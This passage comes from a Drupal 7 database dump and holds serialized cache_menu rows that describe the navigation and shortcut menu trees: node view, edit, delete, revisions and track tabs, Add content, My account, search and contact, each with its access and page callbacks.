permalink\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:4;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"4\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:11:\"filter/tips\";s:11:\"router_path\";s:11:\"filter/tips\";s:10:\"link_title\";s:12:\"Compose tips\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"4\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:16:\"filter_tips_long\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"filter/tips\";s:5:\"title\";s:12:\"Compose tips\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:5;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"5\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/%\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:0:\"\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:5:{i:38;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"38\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:13:\"node/%/delete\";s:11:\"router_path\";s:13:\"node/%/delete\";s:10:\"link_title\";s:6:\"Delete\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:2:\"38\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:31:\"a:2:{i:0;s:6:\"delete\";i:1;i:1;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:45:\"a:2:{i:0;s:19:\"node_delete_confirm\";i:1;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:6:\"Delete\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:41;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"41\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:11:\"node/%/edit\";s:11:\"router_path\";s:11:\"node/%/edit\";s:10:\"link_title\";s:4:\"Edit\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:2:\"41\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:31:\"a:2:{i:0;s:6:\"update\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_edit\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:4:\"Edit\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:52;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"52\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:16:\"node/%/revisions\";s:11:\"router_path\";s:16:\"node/%/revisions\";s:10:\"link_title\";s:9:\"Revisions\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:2:\"52\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"_node_revision_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:22:\"node_revision_overview\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:9:\"Revisions\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:62;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"62\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:11:\"node/%/view\";s:11:\"router_path\";s:11:\"node/%/view\";s:10:\"link_title\";s:4:\"View\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:2:\"62\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:4:\"View\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:356;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"356\";s:4:\"plid\";s:1:\"5\";s:9:\"link_path\";s:12:\"node/%/track\";s:11:\"router_path\";s:12:\"node/%/track\";s:10:\"link_title\";s:5:\"Track\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:3:\"356\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_node_tracker\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:5:\"Track\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:6;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"6\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:8:\"node/add\";s:11:\"router_path\";s:8:\"node/add\";s:10:\"link_title\";s:11:\"Add content\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"6\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"_node_add_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:13:\"node_add_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:8:\"node/add\";s:5:\"title\";s:11:\"Add content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:17;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"17\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"user/%\";s:11:\"router_path\";s:6:\"user/%\";s:10:\"link_title\";s:10:\"My account\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"17\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"user_view_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:14:\"user_view_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:10:\"My account\";s:14:\"title_callback\";s:15:\"user_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:23;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"23\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:15:\"comment/reply/%\";s:11:\"router_path\";s:15:\"comment/reply/%\";s:10:\"link_title\";s:15:\"Add new comment\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"23\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:2;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:2;}\";s:13:\"page_callback\";s:13:\"comment_reply\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"comment/reply/%\";s:5:\"title\";s:15:\"Add new comment\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:27;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"27\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:15:\"taxonomy/term/%\";s:11:\"router_path\";s:15:\"taxonomy/term/%\";s:10:\"link_title\";s:13:\"Taxonomy term\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"27\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:36:\"a:1:{i:2;s:18:\"taxonomy_term_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:18:\"taxonomy_term_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"taxonomy/term/%\";s:5:\"title\";s:13:\"Taxonomy term\";s:14:\"title_callback\";s:19:\"taxonomy_term_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:187;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"187\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"search\";s:11:\"router_path\";s:6:\"search\";s:10:\"link_title\";s:6:\"Search\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"187\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"search_is_active\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:11:\"search_view\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"search\";s:5:\"title\";s:6:\"Search\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:361;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:3:\"361\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:7:\"contact\";s:11:\"router_path\";s:7:\"contact\";s:10:\"link_title\";s:7:\"Contact\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"361\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"access site-wide contact form\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:35:\"a:1:{i:0;s:17:\"contact_site_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:7:\"contact\";s:5:\"title\";s:7:\"Contact\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1423658929,1),('links:shortcut-set-1:page:admin/modules/list/confirm:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658754,1),('links:shortcut-set-1:page:node/2/edit:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658946,1),('links:shortcut-set-1:page:node/2/track:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659004,1),('links:shortcut-set-1:page:node/2:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658921,1),('links:shortcut-set-1:page:node/5/edit:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423775221,1),('links:shortcut-set-1:page:node/5/track:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659018,1),('links:shortcut-set-1:page:node/5:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423659015,1),('links:shortcut-set-1:page:node:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658787,1),('links:shortcut-set-1:page:user/1/edit:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658851,1),('links:shortcut-set-1:page:user/1:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1423658805,1),('links:shortcut-set-1:tree-data:en:9bd1605e2280833450478f9083b7f8714c2fa28f1012455e2744e5af1a13eec5','a:2:{s:4:\"tree\";a:3:{i:216;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:14:\"shortcut-set-1\";s:4:\"mlid\";s:3:\"216\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:8:\"node/add\";s:11:\"router_path\";s:8:\"node/add\";s:10:\"link_title\";s:11:\"Add content\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"216\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"_node_add_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:13:\"node_add_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:8:\"node/add\";s:5:\"title\";s:11:\"Add 